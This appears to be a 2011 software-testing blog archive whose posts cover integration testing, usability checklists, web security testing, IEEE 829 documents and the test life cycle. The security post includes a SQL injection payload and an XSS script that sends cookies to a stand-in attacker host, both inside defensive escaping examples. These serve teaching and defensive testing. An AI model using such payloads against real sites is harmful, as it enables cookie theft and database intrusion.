Thursday, April 21, 2011

Integration Testing: Why? What? & How?

Introduction:
There are various levels of testing:
Unit Testing, Integration Testing, System Testing, Acceptance Testing.
Each level of testing builds on the previous level.

“Unit testing” focuses on testing a unit of the code.
“Integration testing” is the next level of testing; it focuses on testing the integration of those units of code, or components.

How does Integration Testing fit into the Software Development Life Cycle?
Even if a software component is successfully unit tested, in an enterprise n-tier distributed application it is of little or no value if it cannot be successfully integrated with the rest of the application. Once unit-tested components are delivered, we integrate them together. These integrated components are tested to weed out errors and bugs caused by the integration. This is a very important step in the Software Development Life Cycle.

Different programmers, or even different teams, may have developed the components, so a lot of bugs emerge during the integration step.
In most cases a dedicated testing team focuses on Integration Testing.

Prerequisites for Integration Testing:
Before we begin Integration Testing it is important that all the components have been successfully unit tested.

Integration Testing Steps:
Integration Testing typically involves the following Steps:
Step 1: Create a Test Plan
Step 2: Create Test Cases and Test Data
Step 3: If applicable create scripts to run test cases
Step 4: Once the components have been integrated, execute the test cases (see the sketch after this list)
Step 5: Fix the bugs, if any, and retest the code
Step 6: Repeat the test cycle until the components have been successfully integrated
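
As a minimal illustration of Steps 2 and 4, the sketch below (Python with pytest; the component names are hypothetical, not from the original article) shows an integration test case that exercises two components together rather than in isolation:

```python
import pytest

# Hypothetical components: in a real project these would be the
# separately unit-tested modules delivered for integration.
class PriceCalculator:
    def total(self, items):
        return sum(price for _, price in items)

class OrderService:
    def __init__(self, calculator):
        self.calculator = calculator  # integration point between the two components

    def place_order(self, items):
        if not items:
            raise ValueError("order must contain at least one item")
        return {"items": items, "total": self.calculator.total(items)}

# Integration test: verifies the flow of data from OrderService into
# PriceCalculator, rather than testing each unit in isolation.
def test_order_total_is_calculated_through_the_calculator():
    service = OrderService(PriceCalculator())
    order = service.place_order([("book", 10.0), ("pen", 2.5)])
    assert order["total"] == 12.5

def test_empty_order_is_rejected():
    service = OrderService(PriceCalculator())
    with pytest.raises(ValueError):
        service.place_order([])
```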

What is an ‘Integration Test Plan’?
As you may have read in the other articles in the series, this document typically describes one or more of the following:
  • How the tests will be carried out
  • The list of things to be Tested
  • Roles and Responsibilities
  • Prerequisites to begin Testing
  • Test Environment
  • Assumptions
  • What to do after a test is successfully carried out
  • What to do if test fails
  • Glossary

How to write an Integration Test Case?
Simply put, a Test Case describes exactly how the test should be carried out.
The Integration test cases specifically focus on the flow of data/information/control from one component to the other.
So the Integration Test cases should typically focus on scenarios where one component is being called from another. Also the overall application functionality should be tested to make sure the app works when the different components are brought together.
The various Integration Test Cases clubbed together form an Integration Test Suite. Each suite may have a particular focus. In other words different Test Suites may be created to focus on different areas of the application.
As mentioned before, a dedicated Testing Team may be created to execute the Integration test cases. Therefore the Integration Test Cases should be as detailed as possible.

Sample Test Case Table:
A typical Integration Test Case table has the following columns:
  • Test Case ID
  • Test Case Description
  • Input Data
  • Expected Result
  • Actual Result
  • Pass/Fail
  • Remarks

Additionally the following information may also be captured:
  • Test Suite Name
  • Tested By
  • Date
  • Test Iteration (One or more iterations of Integration testing may be performed)
Working towards Effective Integration Testing:
There are various factors that affect Software Integration and hence Integration Testing:

1) Software Configuration Management: Since Integration Testing focuses on the integration of components, and components can be built by different developers and even different development teams, it is important that the right versions of components are tested. This may sound very basic, but the biggest problem faced in n-tier development is integrating the right versions of components. Integration testing may run through several iterations, and components may undergo changes to fix bugs. Hence it is important that a good Software Configuration Management (SCM) policy is in place: we should be able to track the components and their versions, so that each time we integrate the application components we know exactly what versions go into the build process.
2) Automate the Build Process where Necessary: A lot of errors occur because the wrong versions of components were sent for the build, or because components are missing. If possible, write a script to integrate and deploy the components; this helps reduce manual errors (see the sketch after this list).
3) Document: Document the integration/build process to help eliminate errors of omission or oversight. It is possible that the person responsible for integrating the components forgets to run a required script, in which case Integration Testing will not yield correct results.
4) Defect Tracking: Integration Testing will lose its edge if the defects are not tracked correctly. Each defect should be documented and tracked. Information should be captured as to how the defect was fixed. This is valuable information. It can help in future integration and deployment processes.
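
As a minimal sketch of point 2 above, assuming a hypothetical project layout (a components/ directory and an integration_tests suite, names invented for illustration); in practice this role is usually played by a dedicated build tool or CI pipeline:

```python
import shutil
import subprocess
import sys
from pathlib import Path

# Hypothetical component list and build directory; adjust to your project.
COMPONENTS = ["orders", "billing", "inventory"]
BUILD_DIR = Path("build")

def build_and_deploy():
    BUILD_DIR.mkdir(exist_ok=True)
    for name in COMPONENTS:
        src = Path("components") / name
        if not src.exists():
            # Catch missing components before they break the integrated build.
            sys.exit(f"Missing component: {name}")
        shutil.copytree(src, BUILD_DIR / name, dirs_exist_ok=True)
    # Run the integration test suite against the assembled build.
    result = subprocess.run(["pytest", "integration_tests"], cwd=BUILD_DIR)
    return result.returncode

if __name__ == "__main__":
    sys.exit(build_and_deploy())
```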

Summary:
Integration testing is one of the most crucial steps in the Software Development Life Cycle. Different components are integrated together and tested. This can be a daunting task in enterprise applications where diverse teams build different modules and components.

Reference -
http://www.exforsys.com/tutorials/testing/integration-testing-whywhathow.html

Tuesday, April 19, 2011

Web Testing Checklist about Usability

Navigation -
  1. Is terminology consistent?
  2. Are navigation buttons consistently located?
  3. Is navigation to the correct/intended destination? (see the sketch after this list)
  4. Is the flow to destination (page to page) logical?
  5. Is the flow within each page top to bottom, left to right?
  6. Is there a logical way to return?
  7. Are the business steps within the process clear or mapped?
  8. Are navigation standards followed?
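
Some of these checks can be partially automated. Below is a minimal sketch, assuming the Python requests library and a hypothetical list of navigation links, that flags destinations which do not resolve successfully (relates to items 3 and 6 above):

```python
import requests

# Hypothetical navigation links taken from the site map; replace with real URLs.
NAV_LINKS = {
    "Home": "https://example.com/",
    "Products": "https://example.com/products",
    "Contact": "https://example.com/contact",
}

def check_navigation(links):
    """Report links that do not resolve to a successful page."""
    problems = []
    for label, url in links.items():
        response = requests.get(url, allow_redirects=True, timeout=10)
        if response.status_code != 200:
            problems.append((label, url, response.status_code))
    return problems

if __name__ == "__main__":
    for label, url, status in check_navigation(NAV_LINKS):
        print(f"{label}: {url} returned HTTP {status}")
```
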
Ease of Use -
  1. Are help facilities provided as appropriate?
  2. Are selection options clear?
  3. Are ADA standards followed?
  4. Is the terminology appropriate to the intended audience?
  5. Is there minimal scrolling and resizable screens?
  6. Do menus load first?
  7. Do graphics have reasonable load times?
  8. Are there multiple paths through site (search options) that are user chosen?
  9. Are messages understandable?
  10. Are confirmation messages available as appropriate?
Presentation of Information -
  1. Are fonts consistent within functionality?
  2. Are the company display standards followed?
  3. Are the following elements consistent with those standards?
    - Logos
    - Font size
    - Colors
    - Scrolling
    - Object use
  4. Are legal requirements met?
  5. Is content sequenced properly?
  6. Are web-based colors used?
  7. Is there appropriate use of white space?
  8. Are tools provided (as needed) in order to access the information?
  9. Are attachments provided in a static format?
  10. Are spelling and grammar correct?
  11. Are alternative presentation options available (for limited browsers or performance issues)?
How to interpret/Use Info -
  1. Is terminology appropriate to the intended audience?
  2. Are clear instructions provided?
  3. Are there help facilities?
  4. Are there appropriate external links?
  5. Is expanded information provided on services and products? (why and how)
  6. Are multiple views/layouts available?

Reference - http://testinglink.in/topics/web-testing-checklist-about-usability

Sunday, April 17, 2011

An approach for Security Testing of Web Applications

As more and more vital data is stored in web applications and the number of transactions on the web increases, proper security testing of web applications is becoming very important. Security testing is the process that determines that confidential data stays confidential (i.e. it is not exposed to individuals/ entities for which it is not meant) and users can perform only those tasks that they are authorized to perform (e.g. a user should not be able to deny the functionality of the web site to other users, a user should not be able to change the functionality of the web application in an unintended way etc.).

Some key terms used in security testing -

Before we go further, it will be useful to be aware of a few terms that are frequently used in web application security testing:

What is “Vulnerability”?
This is a weakness in the web application. The cause of such a “weakness” can be bugs in the application, an injection (SQL/ script code) or the presence of viruses.
What is “URL manipulation”?
Some web applications communicate additional information between the client (browser) and the server in the URL. Changing some information in the URL may sometimes lead to unintended behavior by the server.
What is “SQL injection”?
This is the process of inserting SQL statements through the web application user interface into some query that is then executed by the server.
What is “XSS (Cross Site Scripting)”?
When a user inserts HTML/ client-side script in the user interface of a web application and this insertion is visible to other users, it is called XSS.
What is “Spoofing”?
The creation of hoax look-alike websites or emails is called spoofing.

Security testing approach:

In order to perform a useful security test of a web application, the security tester should have good knowledge of the HTTP protocol. It is important to have an understanding of how the client (browser) and the server communicate using HTTP. Additionally, the tester should at least know the basics of SQL injection and XSS. Hopefully, the number of security defects present in the web application will not be high. However, being able to accurately describe the security defects with all the required details to all concerned will definitely help.

1. Password cracking:
The security testing on a web application can be kicked off by “password cracking”. In order to log in to the private areas of the application, one can either guess a username/ password or use some password cracker tool for the same. Lists of common usernames and passwords are available along with open source password crackers. If the web application does not enforce a complex password (e.g. with alphabets, number and special characters, with at least a required number of characters), it may not take very long to crack the username and password.
If the username or password is stored in cookies without encryption, an attacker can use different methods to steal the cookies and then the information stored in them, such as the username and password. For more details see the article on "Website cookie testing".
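
As a minimal illustration of the complexity rule mentioned above, the sketch below implements a hypothetical password policy check in Python; real applications would normally rely on their framework's own validators:

```python
import re

def is_complex_enough(password, min_length=8):
    """Check a password against a simple complexity policy:
    minimum length, letters, digits, and special characters."""
    if len(password) < min_length:
        return False
    has_letter = re.search(r"[A-Za-z]", password) is not None
    has_digit = re.search(r"\d", password) is not None
    has_special = re.search(r"[^A-Za-z0-9]", password) is not None
    return has_letter and has_digit and has_special

assert not is_complex_enough("password")   # too simple, easy to crack
assert is_complex_enough("S3cure!Pass")    # meets the policy
```
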
2. URL manipulation through HTTP GET methods:
The tester should check if the application passes important information in the querystring. This happens when the application uses the HTTP GET method to pass information between the client and the server. The information is passed in parameters in the querystring. The tester can modify a parameter value in the querystring to check if the server accepts it.
Via an HTTP GET request, user information is passed to the server for authentication or for fetching data. An attacker can manipulate every input variable passed in this GET request in order to obtain the required information or to corrupt the data. In such conditions, any unusual behavior by the application or web server is a doorway for the attacker into the application.
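
A minimal sketch of such a check, assuming the Python requests library and a hypothetical endpoint that carries a user id in the querystring; the test tampers with the parameter and expects the server to refuse it:

```python
import requests

# Hypothetical endpoint that passes the user id in the querystring.
BASE_URL = "https://example.com/account"

def test_tampered_userid_is_rejected():
    # Request a user id the current session should not be allowed to see.
    response = requests.get(BASE_URL, params={"userid": "9999"}, timeout=10)
    # The server should respond with an authorization error,
    # never with another user's data.
    assert response.status_code in (401, 403)
```
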
3. SQL Injection:
The next thing that should be checked is SQL injection. Entering a single quote (‘) in any textbox should be rejected by the application. Instead, if the tester encounters a database error, it means that the user input is inserted in some query which is then executed by the application. In such a case, the application is vulnerable to SQL injection.
SQL injection attacks are very critical because an attacker can get vital information from the server database. To find SQL injection entry points into your web application, identify the code in your code base where direct MySQL queries are executed against the database using user input.
If user input is placed into SQL queries that are run against the database, an attacker can inject SQL statements, or parts of SQL statements, as input to extract vital information from the database. Even if the attacker only succeeds in crashing the application, the SQL error shown in the browser may reveal the information they are looking for. Special characters in user input should be handled/escaped properly in such cases.
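
To make the underlying cause concrete, the sketch below uses Python's built-in sqlite3 module (table and data are invented for illustration) to contrast a query built by string concatenation with a parameterized query; the same idea applies to MySQL drivers:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'secret')")

user_input = "' OR '1'='1"  # a classic injection payload

# Vulnerable: user input is concatenated directly into the SQL string,
# so the injected condition makes the query match every row.
vulnerable = conn.execute(
    "SELECT * FROM users WHERE name = '" + user_input + "'"
).fetchall()

# Safe: the driver passes the value as a bound parameter,
# so the payload is treated as plain data and matches nothing.
safe = conn.execute(
    "SELECT * FROM users WHERE name = ?", (user_input,)
).fetchall()

print("concatenated query returned", len(vulnerable), "rows")   # 1
print("parameterized query returned", len(safe), "rows")        # 0
```
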
4. Cross Site Scripting (XSS):
The tester should additionally check the web application for XSS (Cross Site Scripting). Any HTML (e.g. <HTML>) or script (e.g. <SCRIPT>) should not be accepted by the application. If it is, the application can be prone to a Cross Site Scripting attack.
An attacker can use this method to execute a malicious script or URL in the victim's browser. Using cross-site scripting, an attacker can use scripts such as JavaScript to steal user cookies and the information stored in them.
Many web applications accept some user information and pass it between pages in variables.
E.g.: http://www.examplesite.com/index.php?userid=123&query=xyz
An attacker can easily pass malicious input or a <script> tag in the ‘query’ parameter, which can expose important user/server data in the browser.
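
On the defensive side, a minimal sketch using Python's standard html module; the surrounding request-handling code is hypothetical:

```python
import html

def render_search_results(query):
    """Build the HTML fragment that echoes the user's query back.
    Escaping the value prevents injected markup from executing."""
    safe_query = html.escape(query)
    return f"<p>Results for: {safe_query}</p>"

payload = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
print(render_search_results(payload))
# The payload is rendered as inert text (&lt;script&gt;...), not executed.
```
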
Important: During security testing, the tester should be very careful not to modify any of the following:
• Configuration of the application or the server
• Services running on the server
• Existing user or customer data hosted by the application
Additionally, a security test should be avoided on a production system.
The purpose of the security test is to discover the vulnerabilities of the web application so that the developers can then remove these vulnerabilities from the application and make the web application and data safe from unauthorized actions.

Reference - http://www.softwaretestinghelp.com/security-testing-of-web-applications/

Friday, April 15, 2011

Difference between various Specifications Documents – For Test Design, Test Cases & Test Procedures

IEEE 829 standard prescribes many specifications related documents. Three such documents are -
1. Test Design Specifications
2. Test Case Specifications
3. Test Procedure Specifications

Let us go a bit deeper into the salient features of each of these documents, all of which are crucially important in any testing effort.

1. Test Design Specification:

“A document specifying the test conditions (coverage items) for a test item, the detailed test approach and identifying the associated high level test cases.”

The objective of compiling test design specifications is to identify the set of features, or combination of features, to be tested and to identify the group of test cases that will adequately test those features. In addition, it contains any refinements made to the approach described in the test plan.

The test design specification consists of the following essential parts:

  1. Test design specification identifier: A unique identifier is to be allocated so that the test design specification document can be distinguished from all other documents.
  2. Features to be tested: It describes the test items and the features that are the object of this test design specification.
  3. Approach refinements: It describes the test techniques to be adopted for this test design.
  4. Test identification: It describes a comprehensive list of test cases associated with this test design. It provides a unique identifier and a short description for every test case.
  5. Acceptance criteria: It describes the criteria to confirm as to whether each feature has passed or failed during testing.
2. Test Case Specification:

“A document specifying a set of test cases (objective, inputs, test actions, expected results, and execution preconditions) for a test item.”

The objective of compiling the test case specifications is to specify in detail each test case listed in the test design specification.

The test case specification consists of the following essential parts:

  1. Test case specification identifier: A unique identifier so that this document can be distinguished from all other documents.
  2. Test items: Identifies the items and features to be tested by the particular test case.
  3. Input specifications: It describes details of each & every input required by the particular test case.
  4. Output specifications: It describes each output expected after executing the particular test case.
  5. Environmental needs: It describes any special hardware, software, facilities, etc. required for the execution of the particular test case that were not listed in its associated test design specification.
  6. Special procedural requirements: It describes any special setup, execution, or cleanup procedures unique to the particular test case.
  7. Inter-case dependencies: It describes a comprehensive list of all test cases that must be executed prior to the particular test case.
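
As a minimal illustration, the parts listed above could be captured in a structured form such as the hypothetical Python dataclass below:

```python
from dataclasses import dataclass, field
from typing import List

@dataclass
class TestCaseSpecification:
    """Structured form of an IEEE 829 style test case specification."""
    identifier: str                            # unique test case specification identifier
    test_items: List[str]                      # items/features covered by this test case
    input_specification: str                   # inputs required by the test case
    output_specification: str                  # expected outputs
    environmental_needs: str = ""              # special hardware/software/facilities
    special_procedural_requirements: str = ""  # setup/execution/cleanup notes
    intercase_dependencies: List[str] = field(default_factory=list)  # test cases to run first

example = TestCaseSpecification(
    identifier="TC-LOGIN-001",
    test_items=["Login page"],
    input_specification="Valid username and password",
    output_specification="User is redirected to the dashboard",
    intercase_dependencies=["TC-SETUP-001"],
)
print(example.identifier, "depends on", example.intercase_dependencies)
```
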
3. Test Procedure Specification:

“A document specifying a sequence of actions for the execution of a test. Also known as test script or manual test script.”

The objective of compiling the test procedure specifications is to specify the steps for executing a test case and the process for determining whether the software passed or failed the test.

The test procedure specification consists of the following essential parts:

  1. Test procedure specification identifier: A unique identifier is to be allocated so that the test procedure specification document can be distinguished from all other documents.
  2. Objective: It describes the objective of the test procedure and its corresponding test cases.
  3. Special requirements: It describes a comprehensive list of all special requirements for the execution of the particular test procedure.
  4. Procedure steps: It describes a comprehensive list of all steps of the procedure. Possible steps may consist of the following:
    • Set up
    • Start
    • Proceed
    • Measure
    • Shut Down
    • Restart
    • Stop
    • Finally, wind up

Reference -
ISTQB Glossary of Testing Terms 2.1
http://www.softwaretestinggenius.com/articaldetails.php?mode=details&qry=764&parent=125

Wednesday, April 13, 2011

Six functional tests to ensure software quality

Six types of functional testing can be used to ensure the quality of the end product. Understand these testing types and scale the execution to match the risk to the project.

1. Ensure every line of code executes properly with Unit Testing.

Unit testing is the process of testing each unit of code in a single component. This form of testing is carried out by the developer as the component is being developed. The developer is responsible for ensuring that each detail of the implementation is logically correct. Unit tests are normally discussed in terms of the type of coverage they provide:
Function coverage: each function/method is executed by at least one test case.
Statement coverage: each line of code is covered by at least one test case (requires more test cases than function coverage).
Path coverage: every possible path through the code is covered by at least one test case (requires many test cases).
Unit tests allow developers to continually ensure that a unit of code does what is intended even as associated units change. As the software evolves, unit tests are modified, serving as an up-to-date form of documentation.
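
A minimal sketch of these coverage ideas, using a hypothetical function and pytest-style unit tests; the comments indicate which kind of coverage each test contributes:

```python
import pytest

def shipping_cost(weight_kg, express=False):
    """Hypothetical unit under test: cost rises with weight, express doubles it."""
    if weight_kg <= 0:
        raise ValueError("weight must be positive")
    cost = 5.0 + 2.0 * weight_kg
    if express:
        cost *= 2
    return cost

# Function coverage: at least one test calls shipping_cost at all.
def test_standard_shipping():
    assert shipping_cost(2) == 9.0

# Statement coverage: together these tests execute every line,
# including the error branch and the express branch.
def test_invalid_weight_raises():
    with pytest.raises(ValueError):
        shipping_cost(0)

def test_express_shipping_doubles_cost():
    assert shipping_cost(1, express=True) == 14.0

# Path coverage would additionally require exercising every combination
# of branch outcomes (e.g. valid weight with and without express).
```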

2. Ensure every function produces its expected outcome with Functional Testing.

Functional testing addresses concerns surrounding the correct implementation of functional requirements. Commonly referred to as black box testing, this type of testing requires no knowledge of the underlying implementation.
Functional test suites are created from requirement use cases, with each scenario becoming a functional test. As a component is implemented, the respective functional test is applied to it after it has been unit tested.
For many projects, it is unreasonable to test every functional aspect of the software. Instead, define functional testing goals that are appropriate for the project. Prioritize critical and widely used functions and include other functions as time and resources permit.
For detailed information on how to correctly develop use cases to support functional testing, refer to the Info-Tech Advisor research note, "Use Cases: Steer Clear of the Pitfalls."
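
As a minimal sketch, each use case scenario can become one functional test that exercises the feature purely through its public interface; the function and scenarios below are hypothetical:

```python
import pytest

# Hypothetical public interface of the component under test.
def register_user(username, password):
    if not username:
        return "error: username required"
    if len(password) < 8:
        return "error: password too short"
    return "ok"

# Each tuple corresponds to one scenario from the requirement use case.
SCENARIOS = [
    ("valid registration", "alice", "S3cure!Pass", "ok"),
    ("missing username", "", "S3cure!Pass", "error: username required"),
    ("weak password", "alice", "abc", "error: password too short"),
]

@pytest.mark.parametrize("name,username,password,expected", SCENARIOS)
def test_registration_scenarios(name, username, password, expected):
    # Black-box check: only inputs and observable outputs, no internals.
    assert register_user(username, password) == expected
```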

3. Ensure all functions combine to deliver the desired business result with System Testing.

System testing executes end-to-end functional tests that cross software units, helping to realize the goal of ensuring that components combine to deliver the desired business result. In defining the project's system testing goals, focus on those scenarios that require critical units to integrate.
Also, consider whether all subsystems should be tested first or if all layers of a single subsystem should be tested before being combined with another subsystem.
Combining all the components in a single step should be avoided. The issue with this approach is the difficulty of localizing errors. Components should be integrated incrementally after each has been tested in isolation.

4. Ensure new changes did not adversely affect other parts of the system with Regression Testing.

Regression testing ensures code modifications have not inadvertently introduced bugs into the system or changed existing functionality. Goals for regression testing should include plans from the original unit, functional, and system test phases to demonstrate that existing functionality behaves as intended.
Determining when regression testing is sufficient can be difficult. Although it is not desirable to test the entire system again, critical functionality should be tested regardless of where the modification occurred. Regression testing should be done frequently to ensure a baseline software quality is maintained.

5. Ensure the system integrates with and does not adversely affect other enterprise systems with System Integration Testing.

System integration testing is a process that assesses the software's interoperability and cooperation with other applications. Define testing goals that will exercise required communication. (It is fruitless to test interaction between systems that will not collaborate once the developed system is installed.) This is done using process flows that encapsulate the entire system.
The need for a developed system to coexist with existing enterprise applications necessitates developing testing goals that can uncover faults in their integration. In the case that the new system is standalone software and there is no requirement for compatibility with any other enterprise system, system integration testing can be ignored.

6. Ensure the customer is satisfied with the system with Acceptance Testing.

Acceptance testing aims to test how well users interact with the system, that it does what they expect and is easy to use. Although it is the final phase of testing before software deployment, the tests themselves should be defined as early as possible in the SDLC. Early definition ensures customer expectations are set appropriately and confirms for designers that what they are building will satisfy the end user's requirements. To that end, acceptance test cases are developed from user requirements and are validated in conjunction with actual end users of the system. The process results in acceptance or rejection of the final product.

Reference - http://searchsoftwarequality.techtarget.com/report/Six-functional-tests-to-ensure-software-quality

Sunday, April 10, 2011

How a Good Bug Hunter Prioritizes his Bug Hunting Activities in Software Testing

Let us first understand what a bug hunter is.

A bug hunter is an experienced & enthusiastic exploratory tester. Good bug hunters usually do the following:
  1. Do initial exploratory testing of a suspect area, to develop ideas for more detailed attacks that can be performed by less experienced testers.
  2. Explore an area that is allegedly low risk - can he quickly find bugs that would lead to reassessment of the risk?
  3. Troubleshoot key areas that seem prone to irreproducible bugs.
  4. Find critical bugs that will convince the project manager to slip a (premature) release date.

How to prioritize the bug hunting activities?

Generally the mission of a good bug hunter is finding bugs that are important (as opposed to insignificant) and finding them quickly. If so, what does this mean in terms of the tests that are run?
You can use the following suggestions to prioritize bug hunting in your software testing effort.
  1. Test things that are changed before things that are the same. Fixes and updates mean fresh risk.
  2. Test core functions before contributing functions. Test the critical and the popular things that the product does. Test the functions that make the product what it is.
  3. Test capability before reliability. Test whether each function can work at all before going deep into the examination of how any one function performs under many different conditions.
  4. Test common situations before esoteric situations. Use popular data and scenarios of use.
  5. Test common threats before exotic threats. Test with the most likely stress and error situations.
  6. Test for high-impact problems before low-impact problems. Test the parts of the product that would do a lot of damage in case of failure.
  7. Test the most wanted areas before areas not requested. Test any areas and for any problems that are of special interest to someone else on the team.
Conclusion: You will also find important problems sooner if you know more about the product, the software and hardware it must interact with, and the people who will use it. Study these thoroughly.


Reference - http://www.softwaretestinggenius.com/articalDetails.php?qry=960

Tuesday, April 5, 2011

Software Test Process / STLC

I) Test Planning

(Primary Role: Test Lead/Team Lead)

Input/Reference:
  1. Requirements specification
  2. Test Strategy
  3. Project plan
  4. Use cases/design docs/Prototype screen
  5. Process Guidelines docs
Templates:
  1. Review Report
  2. Test Plan
Roles:
  1. Test Lead/Team Lead: Test Planning
  2. Test Engineers: Contribution to Test plan
  3. BA: Clarifications on Requirements
Tasks:
  1. Understanding & Analyzing the Requirements
  2. Test Strategy Implementation
  3. Test Estimations (Time, Resources-Environmental, Human, Budget)
  4. Risk Analysis
  5. Team formation
  6. Configuration management plan
  7. Test Plan Documentation
  8. Test Environment set-up defining
Output:
          Test Plan Document


II) Test Design



Input/Reference:
  1. Requirements specification
  2. Test Plan
  3. Use cases/design docs/Prototype screen
  4. Process Guidelines docs
Templates:
  1. Test scenarios
  2. Test case
  3. Test data
Roles:
  1. Test Engineers: Test case documentation
  2. Test Lead/Team Lead: Guidance, monitoring & Control
  3. BA: Clarifications on Requirements
Tasks:
  1. Creating Test scenarios
  2. Test case documentation
  3. Test data collection
Output:
  1. Test case Documents
  2. Test Data


III) Test Execution



Input/Reference:
  1. Requirements specification
  2. Test Plan
  3. Test Case docs
  4. Test data
  5. Test Environment
Templates:
  1. Defect Report
  2. Test Report
Roles:
  1. Test engineers: Test execution
  2. Test Lead: Guidance, monitoring & Control
  3. BA: Clarifications on Requirements
  4. System Administrator/Network Administrator: Test Environment set-up
Tasks:
  1. Forming Test Batches
  2. Verifying Test Environment set-up
  3. Test Execution
  4. Test reporting
  5. Defect Reporting
  6. Regression Testing
Output:
  1. Test Reports
  2. Opened/Closed Defect Reports


IV) Test Closure



Input/Reference:
  1. Requirements
  2. Test Plan
  3. Test Reports
  4. Opened/Closed Defect Reports
Templates:
          Test Summary Report

Roles:
  1. Test Lead: Deciding when to stop testing & creating the Test Summary Report
  2. Testers: Contribution
Tasks:
  1. Evaluating Exit criteria
  2. Collecting all facts from Testing activities
  3. Sending Test deliverables to the Customer
  4. Improvement suggestions for future projects
Output:
  1. Test Summary Report
  2. Test Deliverables (Test Plan, Test scenarios, Test cases, Test Data, Test Reports, Opened/Closed defect reports, Test Summary Report)


Reference - http://www.gcreddy.com/2010/01/synchronization.html
